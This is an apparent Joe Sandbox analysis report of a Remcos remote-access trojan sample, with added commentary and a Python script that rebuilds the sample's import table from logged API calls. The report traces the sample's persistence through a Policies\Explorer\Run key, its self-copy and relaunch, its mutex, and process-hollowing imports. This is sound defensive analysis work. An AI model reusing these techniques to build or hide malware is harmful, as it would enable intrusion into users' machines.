                                • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
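The list above is how Joe Sandbox logs a hand-rolled import resolver: every LoadLibraryA or GetModuleHandleA is immediately followed by a GetProcAddress whose module handle is logged as 00000000, and the procedure name shows up in the loader call's second slot because the sandbox dumps a fixed window of stack values rather than the call's real argument list. The same name, GetProcessImageFileNameW, is looked up first in Psapi and then in Kernel32, and one Shlwapi lookup passes 0000000C, which is an ordinal rather than a name string. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it pairs each loader line with the GetProcAddress that follows it to rebuild the resolved import table, treats a small hex value in the name slot as an ordinal, and tags the procedures that matter for triage. The sample input is a subset of the lines above; the capability descriptions are the documented meaning of each API, not findings from the report.

```python
from __future__ import annotations

import re

# Constructed sample: lines in the shape Joe Sandbox prints under "APIs" for the
# resolver at 0041CB50 (values copied from the report, list shortened).
SAMPLE_API_LOG = """\
• LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
• GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
• GetProcAddress.KERNEL32(00000000), ref: 0041CB88
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
• GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
• GetProcAddress.KERNEL32(00000000), ref: 0041CC11
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
• GetProcAddress.KERNEL32(00000000), ref: 0041CC25
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
• GetProcAddress.KERNEL32(00000000), ref: 0041CC86
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
• GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
• LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
• GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
"""

# LoadLibraryA/GetModuleHandleA take one argument.  The sandbox prints a fixed
# window of stack slots, so slot 2 is the name string already pushed for the
# GetProcAddress that follows.  GetProcAddress itself is logged with the module
# handle still unknown (00000000), so the pairing has to be done here.
LOADER_RE = re.compile(
    r"^\W*(?P<api>LoadLibraryA|GetModuleHandleA)\.\w+\((?P<module>[^,]+),(?P<name>[^,]+),"
)
GETPROC_RE = re.compile(r"^\W*GetProcAddress\.\w+\(.*\), ref: (?P<ref>[0-9A-F]{8})")

# Documented meaning of the APIs that matter most when triaging this resolver.
CAPABILITY_HINTS = {
    "NtUnmapViewOfSection": "unmaps a section in a (remote) process; process-hollowing primitive",
    "NtSuspendProcess": "suspends every thread of a process",
    "NtResumeProcess": "resumes a suspended process",
    "NtQueryInformationProcess": "process introspection (PEB, debug port, image path)",
    "IsUserAnAdmin": "checks whether the current token is elevated",
    "SetProcessDEPPolicy": "changes the DEP policy of the current process",
    "GetExtendedTcpTable": "enumerates TCP connections with owning PIDs",
    "GetExtendedUdpTable": "enumerates UDP endpoints with owning PIDs",
    "GetProcessImageFileNameW": "resolves an image path from a process handle",
    "RmStartSession": "Restart Manager: finds processes holding a file open",
}


def resolve_imports(log: str) -> list[tuple[str, str, str]]:
    """Rebuild (module, procedure, ref-of-GetProcAddress) triples from the API log."""
    imports: list[tuple[str, str, str]] = []
    pending = None
    for line in log.splitlines():
        m = LOADER_RE.match(line)
        if m:
            name = m.group("name")
            # An 8-digit hex value in the name slot is an ordinal, not a string pointer.
            if re.fullmatch(r"[0-9A-Fa-f]{8}", name):
                name = f"#{int(name, 16)}"
            pending = (m.group("module"), name)
            continue
        m = GETPROC_RE.match(line)
        if m and pending is not None:
            imports.append((pending[0], pending[1], m.group("ref")))
            pending = None
    return imports


def tag_capabilities(imports: list[tuple[str, str, str]]) -> dict[str, str]:
    """Map each resolved procedure with a known triage meaning to that meaning."""
    return {proc: CAPABILITY_HINTS[proc] for _, proc, _ in imports if proc in CAPABILITY_HINTS}


def unresolved_ordinals(imports: list[tuple[str, str, str]]) -> list[tuple[str, str]]:
    """Ordinal imports the sandbox could not name; these need manual lookup."""
    return [(mod, proc) for mod, proc, _ in imports if proc.startswith("#")]


if __name__ == "__main__":
    table = resolve_imports(SAMPLE_API_LOG)
    for mod, proc, ref in table:
        print(f"{ref}  {mod}!{proc}  {CAPABILITY_HINTS.get(proc, '')}")
    print("ordinals:", unresolved_ordinals(table))
```

The pairing is only valid because this resolver is linear: one loader call, one GetProcAddress, in sequence. A resolver that loads a module once and then walks a name array would need the GetProcAddress lines matched to the module by handle value, which the sandbox does not record here.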
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad$HandleModule
                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                • API String ID: 4236061018-3687161714
                                • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed / • Not Executed (node colouring legend)
                                [Control-flow graph of 0040E9C5 (basic blocks 40e9c5 through 40f34d), rendered as a text edge list. Calls shown in the graph: 41cb50 (the LoadLibraryA/GetProcAddress resolver listed above), GetModuleFileNameW, 40d069 (CreateMutexA), 40cdf9 (the copy-and-relaunch helper), seven CreateThread sites (40efc3, 40f0c8, 40f11d, 40f16e, 40f243, 40f258, 40f26d), StrToIntA, 4134ff (RegOpenKeyExA/RegQueryValueExA), and a loop at 40f32f..40f34b that repeats DeleteFileW with a Sleep (40f334) between attempts.]
                                APIs
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\1m70ggeepT.exe,00000104), ref: 0040E9EE
                                  • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                • String ID: (x$8SG$8SG$Access Level: $Administrator$C:\Users\user\Desktop\1m70ggeepT.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-3XK1S0$Software\$User$dMG$del$del$exepath$licence$license_code.txt$Mw
                                • API String ID: 2830904901-3220161554
                                • Opcode ID: 8a6c2c2187a766e7c71a5247d826f4c94b5c0f918bced47fe90c81bb18daf3e4
                                • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                • Opcode Fuzzy Hash: 8a6c2c2187a766e7c71a5247d826f4c94b5c0f918bced47fe90c81bb18daf3e4
                                • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • _wcslen.LIBCMT ref: 0040CE07
                                • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,00000000,?,(x,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                • CopyFileW.KERNELBASE(C:\Users\user\Desktop\1m70ggeepT.exe,00000000,00000000,00000000,00000000,00000000,?,(x,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                • _wcslen.LIBCMT ref: 0040CEE6
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\1m70ggeepT.exe,00000000,00000000), ref: 0040CF84
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                • _wcslen.LIBCMT ref: 0040CFC6
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,(x,0000000E), ref: 0040D02D
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                • ExitProcess.KERNEL32 ref: 0040D062
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                • String ID: (x$6$C:\Users\user\Desktop\1m70ggeepT.exe$del$hdF$open$Mw
                                • API String ID: 1579085052-932157811
                                • Opcode ID: f93ee9b19be39af8b2c6cf1a511189d127526c6382b99c39daec8717fd067cfe
                                • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                • Opcode Fuzzy Hash: f93ee9b19be39af8b2c6cf1a511189d127526c6382b99c39daec8717fd067cfe
                                • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DB9A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                • API String ID: 82841172-425784914
                                • Opcode ID: 35529518f688bb00822c59c31e380965135d22232495089cf56779e66837349f
                                • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                • Opcode Fuzzy Hash: 35529518f688bb00822c59c31e380965135d22232495089cf56779e66837349f
                                • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                  • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                  • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,(x,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                • String ID: (32 bit)$ (64 bit)$(x$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 782494840-3884541626
                                • Opcode ID: 96ddb31e540ae966eb624fdd9b0772b0253fe90f3b489e3583c12feb0da0b553
                                • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                • Opcode Fuzzy Hash: 96ddb31e540ae966eb624fdd9b0772b0253fe90f3b489e3583c12feb0da0b553
                                • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                control_flow_graph 656 413814-413827 RegCreateKeyW 657 413866 656->657 658 413829-413864 call 40247c call 401f04 RegSetValueExW RegCloseKey 656->658 660 413868-413876 call 401f09 657->660 658->660
                                APIs
                                • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                                • RegSetValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,Mw,759237E0,?), ref: 0041384D
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,Mw,759237E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                                • Mw, xrefs: 00413814
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Mw
                                • API String ID: 1818849710-2982982977
                                • Opcode ID: 7402a2b63bcdafcb128c4f053b5539bf219f88ac2658cd62b5e42ce82679dadc
                                • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                • Opcode Fuzzy Hash: 7402a2b63bcdafcb128c4f053b5539bf219f88ac2658cd62b5e42ce82679dadc
                                • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                control_flow_graph 666 40d069-40d095 call 401fab CreateMutexA GetLastError
                                APIs
                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                • GetLastError.KERNEL32 ref: 0040D083
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateErrorLastMutex
                                • String ID: Rmc-3XK1S0
                                • API String ID: 1925916568-1463236701
                                • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                control_flow_graph 697 4135a6-4135d2 RegOpenKeyExA 698 4135d4-4135fc RegQueryValueExA RegCloseKey 697->698 699 413607 697->699 700 413609 698->700 701 4135fe-413605 698->701 699->700 702 41360e-41361a call 402093 700->702 701->702
                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                • RegCloseKey.KERNELBASE(?), ref: 004135F2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                • Opcode Fuzzy Hash: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E1
                                • _free.LIBCMT ref: 0044F41A
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F421
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnvironmentStrings$Free_free
                                • String ID:
                                • API String ID: 2716640707-0
                                • Opcode ID: 0c06709d10dba2764a1cbb07d76eee89d47f0343aa971453893a7dc6290cd450
                                • Instruction ID: a95b0472bde791e81118f5b212bf6f07b4125f005b99c6aef0626ee370485fe8
                                • Opcode Fuzzy Hash: 0c06709d10dba2764a1cbb07d76eee89d47f0343aa971453893a7dc6290cd450
                                • Instruction Fuzzy Hash: 50E06577144A216BB211362A7C49D6F2A18DFD67BA727013BF45486143DE288D0641FA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                control_flow_graph 705 413549-413571 RegOpenKeyExA 706 4135a0 705->706 707 413573-41359e RegQueryValueExA RegCloseKey 705->707 708 4135a2-4135a5 706->708 707->708
                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                • RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
